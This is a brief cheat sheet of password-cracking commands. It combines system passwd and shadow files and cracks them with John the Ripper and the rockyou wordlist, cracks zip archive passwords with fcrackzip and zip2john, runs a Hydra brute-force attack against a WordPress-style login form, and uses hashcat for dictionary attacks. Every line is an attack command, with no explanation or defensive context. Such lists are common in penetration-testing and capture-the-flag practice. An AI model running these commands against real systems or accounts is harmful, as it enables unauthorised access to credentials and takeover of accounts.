Password Brute Forcing
unshadow passwd shadow > creds.txt
john --wordlist=rockyou.txt creds.txt
fcrackzip -u -D -p ‘rockyou.txt’ zip_file
zip2john zip_file > hash.txt
john --format=zip hash.txt
hydra -l username -P password_list IP_ADDR -V http-post-form ‘/path/login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ -t 25
hashcat -a 0 -m hash-mode hash.txt rockyou.txt